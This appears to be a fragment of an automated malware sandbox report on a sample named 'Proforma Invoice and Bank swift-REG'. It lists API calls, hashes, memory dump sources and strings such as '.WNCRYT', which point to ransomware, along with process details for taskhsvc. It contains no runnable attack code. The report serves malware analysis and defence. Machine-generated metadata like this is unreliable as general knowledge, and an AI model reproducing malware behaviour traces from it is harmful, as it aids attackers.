                                                            • API String ID: 3198372872-1369567957
                                                            • Opcode ID: cf50642f78ef5fab84ecba59a6cf7af1d6290f6db1426ef5f0d617c8ec868925
                                                            • Instruction ID: 10a86b0ae793a7b0faed46c7c3bb17ce0abdb28c641acd7ed0c6d67178d7bc95
                                                            • Opcode Fuzzy Hash: cf50642f78ef5fab84ecba59a6cf7af1d6290f6db1426ef5f0d617c8ec868925
                                                            • Instruction Fuzzy Hash: FFF04475808701ABF704DB54DC44AEF73E4EBC4785F508928F94982194F7389659C797
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcscpy.MSVCRT ref: 10001920
                                                            • swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 1000194B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: swprintfwcscpy
                                                            • String ID: %s\%d%s$.WNCRYT
                                                            • API String ID: 2253494011-2625268679
                                                            • Opcode ID: 000e3091f5fb392741d9349167afd51cb84987f96780d8c4e66d3e6cc1a6ed01
                                                            • Instruction ID: 3af0f3f7c414dc9b2a655466e87540e4a569b33180c9e8bcda9b168f9dff8f6e
                                                            • Opcode Fuzzy Hash: 000e3091f5fb392741d9349167afd51cb84987f96780d8c4e66d3e6cc1a6ed01
                                                            • Instruction Fuzzy Hash: 1AE04FB7900610AFE310CB18DC89DEB77A8EBD9301F05052AFA4E97285DBB57915CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:0.3%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:46.3%
                                                            Total number of Nodes:460
                                                            Total number of Limit Nodes:42
6cd726d0 5 API calls 129857->129859 129858 6cd72879 129858->129826 129859->129854 129860->129858 129862 6cd7297b 129860->129862 129865 6cd7290e 129860->129865 129861 6cd72b0b 129863 6cd726d0 5 API calls 129861->129863 129862->129858 129864 6cd72730 5 API calls 129862->129864 129867 6cd729b7 129862->129867 129866 6cd72b1b 129863->129866 129864->129862 129865->129858 129865->129861 129865->129867 129868 6cd72730 VirtualQuery VirtualProtect GetLastError VirtualQuery VirtualProtect 129865->129868 129869 6cd72963 129865->129869 129866->129826 129867->129858 129870 6cd729e6 VirtualQuery 129867->129870 129868->129865 129871 6cd726d0 5 API calls 129869->129871 129872 6cd72ae6 129870->129872 129873 6cd72a0c VirtualProtect 129870->129873 129871->129858 129874 6cd726d0 5 API calls 129872->129874 129873->129867 129874->129861 129879 6cd72744 129875->129879 129876 6cd7285a 129877 6cd726d0 8 API calls 129876->129877 129888 6cd7286a 129877->129888 129878 6cd7280f 129878->129829 129879->129876 129879->129878 129880 6cd7279e VirtualQuery 129879->129880 129881 6cd727cd 129880->129881 129882 6cd7283a 129880->129882 129881->129878 129884 6cd727e1 VirtualProtect 129881->129884 129883 6cd726d0 8 API calls 129882->129883 129883->129876 129884->129878 129885 6cd72824 GetLastError 129884->129885 129887 6cd726d0 8 API calls 129885->129887 129886 6cd72879 129886->129829 129887->129882 129888->129886 129893 6cd7297b 129888->129893 129894 6cd7290e 129888->129894 129889 6cd72b0b 129890 6cd726d0 8 API calls 129889->129890 129892 6cd72b1b 129890->129892 129891 6cd72730 8 API calls 129891->129893 129892->129829 129893->129886 129893->129891 129901 6cd729b7 129893->129901 129894->129886 129894->129889 129895 6cd72963 129894->129895 129898 6cd72730 8 API calls 129894->129898 129894->129901 129897 6cd726d0 8 API calls 129895->129897 129896 6cd729e6 VirtualQuery 129899 6cd72ae6 129896->129899 129900 6cd72a0c VirtualProtect 129896->129900 129897->129886 129898->129894 129902 6cd726d0 8 API calls 
129899->129902 129900->129901 129901->129886 129901->129896 129902->129889
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$D_add$Library$Free$Load$CountCreateCurrentGlobalL_isserviceMemoryProcessSnapshotStatisticsStatusTickToolhelp32Version
                                                            • String ID: $$($@
                                                            • API String ID: 392320324-1817833950
                                                            • Opcode ID: b9bff13b2684472fafcd16aa1902fdd977665b61fe6e780d124995735568fba1
                                                            • Instruction ID: 6ff176d8f8525a200571418aa8c263d566b921d0a5bd15032eacc60f8450eccf
                                                            • Opcode Fuzzy Hash: b9bff13b2684472fafcd16aa1902fdd977665b61fe6e780d124995735568fba1
                                                            • Instruction Fuzzy Hash: 1D03F2B06093019FDB00EF25C58475BBBF4AF85348F62992DE8988B744D779E44ACF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Graph start: 6ce23110 (legend: Executed / Not Executed)
                                                            • Calls shown: __stack_chk_fail
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f6f884a51c5bc20bd4180bf6c4b7d625bb0174d72e750c62089be1fe84ee7c7
                                                            • Instruction ID: 09b22501809d48c9dd638db9c4902d52344e174a05b5ca8df41bfc43a9aaed01
                                                            • Opcode Fuzzy Hash: 1f6f884a51c5bc20bd4180bf6c4b7d625bb0174d72e750c62089be1fe84ee7c7
                                                            • Instruction Fuzzy Hash: 9421D8B1A183019BDB40DF5AC58070AFBF8BF8A748F15891EE59887710D7799504CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Graph start: 6cf94a80 (legend: Executed / Not Executed)
                                                            • Calls shown: fwrite, vfprintf, abort, VirtualQuery, VirtualProtect, GetLastError
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                            • String ID: @
                                                            • API String ID: 1503958624-2766056989
                                                            • Opcode ID: 3f88c96a29ca0b2e19edcf29d88686294dd5b413436edc3b77bd8d2a995bbd48
                                                            • Instruction ID: bfce08b0f5bb37409e7951b4c4d375de4b8d9058bb938f091079d1caf325ec70
                                                            • Opcode Fuzzy Hash: 3f88c96a29ca0b2e19edcf29d88686294dd5b413436edc3b77bd8d2a995bbd48
                                                            • Instruction Fuzzy Hash: 54414DB2A053018FEB00EF68D58574AFBF4FB56758F45891CE8A897B00E730E944CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Graph start: 6cd726d0 (legend: Executed / Not Executed)
                                                            • Calls shown: fwrite, vfprintf, abort, VirtualQuery, VirtualProtect, GetLastError
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023442567.000000006CD6E000.00000040.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                            • String ID: @
                                                            • API String ID: 1503958624-2766056989
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3024614703.000000006CDDF000.00000080.00000001.01000000.00000010.sdmp, Offset: 6CD90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd90000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                            • String ID: @
                                                            • API String ID: 1503958624-2766056989
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023203273.000000006CD61000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_failcrc32mallocmemcpy
                                                            • String ID:
                                                            • API String ID: 1129898061-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery
                                                            • String ID: @
                                                            • API String ID: 1027372294-2766056989
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023442567.000000006CD6E000.00000040.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery
                                                            • String ID: @
                                                            • API String ID: 1027372294-2766056989
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3024614703.000000006CDDF000.00000080.00000001.01000000.00000010.sdmp, Offset: 6CD90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd90000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery
                                                            • String ID: @
                                                            • API String ID: 1027372294-2766056989
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023203273.000000006CD61000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: crc32memcpy
                                                            • String ID:
                                                            • API String ID: 1641957252-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph not reproduced; named calls shown in it: VirtualQuery, VirtualProtect)
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph not reproduced; named calls shown in it: VirtualQuery, VirtualProtect)
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023442567.000000006CD6E000.00000040.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph not reproduced; named calls shown in it: VirtualQuery, VirtualProtect)
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3024614703.000000006CDDF000.00000080.00000001.01000000.00000010.sdmp, Offset: 6CD90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd90000_taskhsvc.jbxd
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph not reproduced; named calls shown in it: malloc, __stack_chk_fail)
                                                            APIs
                                                            • malloc.MSVCRT(?,?,?,?,?,00000000,?,6CD679AA), ref: 6CD6BF06
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023203273.000000006CD61000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: malloc
                                                            • String ID:
                                                            • API String ID: 2803490479-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph not reproduced; named call shown in it: realloc)
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: realloc
                                                            • String ID:
                                                            • API String ID: 471065373-0
                                                            • Opcode ID: 72d17f84b20e5f282aa748ca403f481a757fac0fa0650571f1c7a9670886f1bd
                                                            • Instruction ID: bf83a206ed1202ec6ef6c0c92f76ef93689f7cb6be8af36345c8e2312df23e10
                                                            • Opcode Fuzzy Hash: 72d17f84b20e5f282aa748ca403f481a757fac0fa0650571f1c7a9670886f1bd
                                                            • Instruction Fuzzy Hash: DA018CB0A097019FD740DF1AD08031AFBF8BFD8758F55C91EE4A987210D77995458F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CONF_module_add.LIBEAY32 ref: 6CEC2CB5
                                                              • Part of subcall function 6CF61EF0: CRYPTO_malloc.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF285EA), ref: 6CF61F32
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CEC2CCA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_module_addO_malloc__stack_chk_fail
                                                            • String ID: h
                                                            • API String ID: 1309345834-2439710439
                                                            • Opcode ID: 894e7a205a1a7de3165f3ad8f310b473b5ad66e311880d92529d30e688e561b6
                                                            • Instruction ID: de12215b9f548d93373304b2a02f1c8a49176c5ca1c609085cec76875a26ab3c
                                                            • Opcode Fuzzy Hash: 894e7a205a1a7de3165f3ad8f310b473b5ad66e311880d92529d30e688e561b6
                                                            • Instruction Fuzzy Hash: AE42C1B56087019FE740DF29C28439BBBF1AF85708F21891DE8A89BB44D779D549CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • BIO_printf.LIBEAY32 ref: 6CF74FAE
                                                              • Part of subcall function 6CECCCD0: BIO_vprintf.LIBEAY32 ref: 6CECCCF5
                                                            • BIO_printf.LIBEAY32 ref: 6CF74FCD
                                                            • i2a_ASN1_OBJECT.LIBEAY32 ref: 6CF74FDD
                                                              • Part of subcall function 6CEF8B00: OBJ_obj2txt.LIBEAY32 ref: 6CEF8B49
                                                              • Part of subcall function 6CEF8B00: BIO_write.LIBEAY32 ref: 6CEF8B70
                                                            • BIO_printf.LIBEAY32 ref: 6CF74FF9
                                                            • i2a_ASN1_STRING.LIBEAY32 ref: 6CF75010
                                                              • Part of subcall function 6CF1B120: BIO_write.LIBEAY32 ref: 6CF1B19C
                                                            • BIO_printf.LIBEAY32 ref: 6CF7502C
                                                            • i2a_ASN1_STRING.LIBEAY32 ref: 6CF75043
                                                            • BIO_printf.LIBEAY32 ref: 6CF7505F
                                                            • i2a_ASN1_INTEGER.LIBEAY32 ref: 6CF7506E
                                                            • BIO_printf.LIBEAY32 ref: 6CF7507E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF7509B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_printf$i2a_$O_write$J_obj2txtO_vprintf__stack_chk_fail
                                                            • String ID: (UNKNOWN)$good
                                                            • API String ID: 557006997-2226463364
                                                            • Opcode ID: 9a7ca846bb72754ff9e4fb76e666ec8bc4ab4181f9501336e07d02a83d42d809
                                                            • Instruction ID: 2d583297b450915b9093e40a8d802a2eb757f28b72f851fddfd5383a60ac4310
                                                            • Opcode Fuzzy Hash: 9a7ca846bb72754ff9e4fb76e666ec8bc4ab4181f9501336e07d02a83d42d809
                                                            • Instruction Fuzzy Hash: 0CE105B16097009FC710EF29D58165BBBF1AF85358F16C82EE9A99BB10D730E845CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • X509_INFO_new.LIBEAY32 ref: 6CF28DF1
                                                              • Part of subcall function 6CF09EE0: CRYPTO_malloc.LIBEAY32 ref: 6CF09F05
                                                            • PEM_read_bio.LIBEAY32 ref: 6CF28E27
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_new.LIBEAY32 ref: 6CF2B317
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_new.LIBEAY32 ref: 6CF2B322
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_new.LIBEAY32 ref: 6CF2B32D
                                                              • Part of subcall function 6CF2B2C0: BIO_gets.LIBEAY32 ref: 6CF2B373
                                                              • Part of subcall function 6CF2B2C0: strlen.MSVCRT ref: 6CF2B3B7
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_grow.LIBEAY32 ref: 6CF2B3DE
                                                              • Part of subcall function 6CF2B2C0: ERR_put_error.LIBEAY32 ref: 6CF2B40E
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_free.LIBEAY32 ref: 6CF2B41A
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_free.LIBEAY32 ref: 6CF2B426
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_free.LIBEAY32 ref: 6CF2B432
                                                            • PEM_get_EVP_CIPHER_INFO.LIBEAY32 ref: 6CF28ED1
                                                            • PEM_do_header.LIBEAY32 ref: 6CF28F05
                                                            • d2i_PrivateKey.LIBEAY32 ref: 6CF28F3D
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF28F55
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF28F65
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF28F75
                                                            • sk_new_null.LIBEAY32 ref: 6CF29110
                                                            • ERR_put_error.LIBEAY32 ref: 6CF29146
                                                            • sk_num.LIBEAY32 ref: 6CF29178
                                                            • sk_free.LIBEAY32 ref: 6CF2918E
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF291A0
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF291B0
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF291C0
                                                            • ERR_peek_last_error.LIBEAY32 ref: 6CF292C3
                                                            • ERR_clear_error.LIBEAY32 ref: 6CF292D2
                                                            • sk_push.LIBEAY32 ref: 6CF292E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$M_freeM_new$R_put_error$M_do_headerM_get_M_growM_read_bioO_getsO_mallocO_newPrivateR_clear_errorR_peek_last_errorX509_d2i_sk_freesk_new_nullsk_numsk_pushstrlen
                                                            • String ID: A$CERTIFICATE$DSA PRIVATE KEY$EC PRIVATE KEY$RSA PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X509 CRL$k$t$t
                                                            • API String ID: 1294304552-307132529
                                                            • Opcode ID: eae49837a76f3f4f1dc6588b52b93b8cf4141fdc2892f60a12ecfd3d011abcbc
                                                            • Instruction ID: 6adebe1c4ec86a5a7574640b91e818adcbaccc0def60fc19d57635c93d091898
                                                            • Opcode Fuzzy Hash: eae49837a76f3f4f1dc6588b52b93b8cf4141fdc2892f60a12ecfd3d011abcbc
                                                            • Instruction Fuzzy Hash: 49D14D716093058FD700DFA5C48079BBBF4BF84758F12892DE9988BB40EB79D944CB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_dup
                                                            • String ID:
                                                            • API String ID: 4119201438-0
                                                            • Opcode ID: b8b78ce47ff6a0167a489e88410ab24c010d27e3f4e49601f17e23f2b3f3ba16
                                                            • Instruction ID: 308cc7bf8d6bfcb31dbedb84ded9482b898535fd4641767f9ba89f24b3eac08f
                                                            • Opcode Fuzzy Hash: b8b78ce47ff6a0167a489e88410ab24c010d27e3f4e49601f17e23f2b3f3ba16
                                                            • Instruction Fuzzy Hash: B1E10A75509B009FDB00DF69C58064BBBF5BF89348F52891CE9989B700D774E90ACF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • d2i_PKCS8_bio.LIBEAY32 ref: 6CF2E72F
                                                              • Part of subcall function 6CF437B0: ASN1_d2i_bio.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF2E734), ref: 6CF437DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_d2i_bioS8_biod2i_
                                                            • String ID: y
                                                            • API String ID: 929219446-4225443349
                                                            • Opcode ID: 55842bdd9c77b645be0ba32273e9408dd7bac38e92134fc7e6f9374a158e7910
                                                            • Instruction ID: 63826926c2e7d1440f03384abb511c0a1eaaf1d8177055d453ebabd21b4ed527
                                                            • Opcode Fuzzy Hash: 55842bdd9c77b645be0ba32273e9408dd7bac38e92134fc7e6f9374a158e7910
                                                            • Instruction Fuzzy Hash: D212C0B56087419FD750DF69C64070BBBF0BB89348F128E1DE9A897710E379A909CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: a91c3f20ce6a65645477b5fa8d22509fae93d5d2e29f80b819db4a15507c6626
                                                            • Instruction ID: 17b988083dd37d8af0da7f21e3d86ef672fe01fe0df38782484658f4744ce225
                                                            • Opcode Fuzzy Hash: a91c3f20ce6a65645477b5fa8d22509fae93d5d2e29f80b819db4a15507c6626
                                                            • Instruction Fuzzy Hash: 52E1D975514B008FCB10EF36C584A4ABBF4BB89318F52991DEAA49B705E730E909CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: A
                                                            • API String ID: 4216919130-3554254475
                                                            • Opcode ID: a590a6be7d587904cf48ceebaade7d16b9fea30e8740ce6b126b82ae46c8352a
                                                            • Instruction ID: e61071db8a67b7eb4f097ba7a8c7775db574124a35a195f186486171006042aa
                                                            • Opcode Fuzzy Hash: a590a6be7d587904cf48ceebaade7d16b9fea30e8740ce6b126b82ae46c8352a
                                                            • Instruction Fuzzy Hash: BE0205715087119FDB00DF29C58054BBBF0BF89328F16AA2DEA989B740D334E945CBD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RSAPublicKey_it.LIBEAY32 ref: 6CF42FC8
                                                            • ASN1_item_i2d_bio.LIBEAY32 ref: 6CF42FD8
                                                              • Part of subcall function 6CEFE120: ASN1_item_i2d.LIBEAY32 ref: 6CEFE154
                                                              • Part of subcall function 6CEFE120: BIO_write.LIBEAY32 ref: 6CEFE189
                                                              • Part of subcall function 6CEFE120: CRYPTO_free.LIBEAY32 ref: 6CEFE19E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF42FEF
                                                            • ASN1_i2d_bio.LIBEAY32 ref: 6CF43025
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Key_itN1_i2d_bioN1_item_i2dN1_item_i2d_bioO_freeO_writePublic__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3426478733-0
                                                            • Opcode ID: e38008620d3f4e0df4c24873dd4b7762b9ca75c681171dc568b7c1e63fecf0d5
                                                            • Instruction ID: 2e68f7d69e142ffb0282bc8cfb231f845ea5006cfebb0909cb453875e83635da
                                                            • Opcode Fuzzy Hash: e38008620d3f4e0df4c24873dd4b7762b9ca75c681171dc568b7c1e63fecf0d5
                                                            • Instruction Fuzzy Hash: 61E1C4759097019FCB40DF39C68165BBBF1BB89304F92991DE5A88B704E331AA498F87
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock
                                                            • String ID: A
                                                            • API String ID: 1396966674-3554254475
                                                            • Opcode ID: b2a954983874f485638b4dd9c5bff437ff397cd35000875a11b9f93b71e427d1
                                                            • Instruction ID: 008a5f1a8d852ca22317131e0cf63f7d1f97501546f1a06d54499b992d6c923b
                                                            • Opcode Fuzzy Hash: b2a954983874f485638b4dd9c5bff437ff397cd35000875a11b9f93b71e427d1
                                                            • Instruction Fuzzy Hash: A1C106B16197019FDB10DF39C28074BBBF1AB99308F42991DEAA88B700D731E955CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EVP_MD_CTX_clear_flags.LIBEAY32 ref: 6CEDCD53
                                                            • ENGINE_get_digest_engine.LIBEAY32 ref: 6CEDCD8C
                                                            • ENGINE_get_digest.LIBEAY32 ref: 6CEDCDA4
                                                            • CRYPTO_free.LIBEAY32 ref: 6CEDCED6
                                                            • ERR_put_error.LIBEAY32 ref: 6CEDCFB7
                                                            • ENGINE_finish.LIBEAY32 ref: 6CEDCD82
                                                              • Part of subcall function 6CEBD660: CRYPTO_lock.LIBEAY32(?,?,?,?,?,?,?,?,?,00000000,?,6CE9E7FF), ref: 6CEBD69B
                                                            • EVP_PKEY_CTX_ctrl.LIBEAY32 ref: 6CEDCE5E
                                                            • ERR_put_error.LIBEAY32 ref: 6CEDCF1F
                                                            • ENGINE_finish.LIBEAY32 ref: 6CEDCFBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_finishR_put_error$E_get_digestE_get_digest_engineO_freeO_lockX_clear_flagsX_ctrl
                                                            • String ID: A
                                                            • API String ID: 2304701372-3554254475
                                                            • Opcode ID: 397ec38f9f0a19682e08dc4f338f0e8cbd08d2b957ffefb53b95e5477d797e51
                                                            • Instruction ID: 86f3b51c46cada453bc0246dfa7cc0474a663683735c1302c4fc4424130b2d13
